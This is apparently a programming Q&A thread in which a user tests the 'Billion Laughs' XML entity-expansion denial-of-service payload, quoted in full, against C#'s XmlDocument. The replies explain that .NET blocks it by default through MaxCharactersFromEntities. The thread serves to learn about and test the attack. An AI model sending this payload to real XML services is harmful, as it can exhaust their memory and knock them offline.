# Is the Billion Laughs Attack supposed to be working in C#?

Tags: c#, xml, security

I am trying to test the XML code from an [MSDN magazine page](http://msdn.microsoft.com/en-us/magazine/ee335713.aspx) where it says that the following lines of code will cause an increase of memory usage up to 3GB when processing.

```
<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
```

When I tried to paste that text into an xml file in Visual Studio it indeed showed a increase in memory and also in CPU usage. However when I tried to put it in a text file, instead of an XML file and load it using c#, it didn't have any impact.

Update: I thought the LoadXml method was supposed to have an impact, but I guess that is not the processing part. When I tried to get the first child it (i.e. c#) threw an exception telling that `MaxCharactersFromEntities` was exceeded.

Update: here is my code as well:

```
using System;
using System.Xml;

namespace BillionLaughsAttack
{
    class Program
    {
        //The file containing the billion laughs mentioned previously
        //a txt file: Since an xml file causes visual studio to parse
        static String xmlFileLocation = "./MyData/DeepXML.txt";

        static void Main(string[] args)
        {
            String xmlContent = null;
            System.IO.StreamReader sr;
            System.Xml.XmlDocument document = new XmlDocument();
            try
            {
                sr = new System.IO.StreamReader(xmlFileLocation);
                xmlContent = sr.ReadToEnd();
                //Load xml containing Billion Laughs Attack (this won't do anything!)
                document.LoadXml(xmlContent);
                //Proces xml by getting first child (this will cause an exception!)
                String val = document.FirstChild.Value;
            }
            catch (Exception e)
            {
                Console.WriteLine(e.Message);
            }
        }
    }
}
```

Comment: How were you loading it in `C#`? Can you show the code?

Comment: The article is well written and *extremely* detailed - it explains the attacks, the defaults of different versions of .net, and the ways of preventing the problem. Honestly, I doubt it doesn't contain the answer to your question.

Answer (score 9, accepted):

This attack exploits a vulnerable **XML** feature.

Running it through an XML parser will recursively expand the entities and occupy a large amount of memory.
Reading it as plain text won't do anything at all.

Comment: Allright, I thought the LoadXml method also parsed the whole content. But it seems that it only parses when I am actually trying to do something with the content like getting the value of the first child. It seems that in that case it causes an exception telling that MaxCharactersFromEntities has been exceeded.

Comment: @ILikeGameProgramming: That's how recent versions of .Net block this attack by default.

Comment: FWIW, Notepad++'s XML Tools plugin reports "XML Parsing error at line 13: Detected an entity reference loop"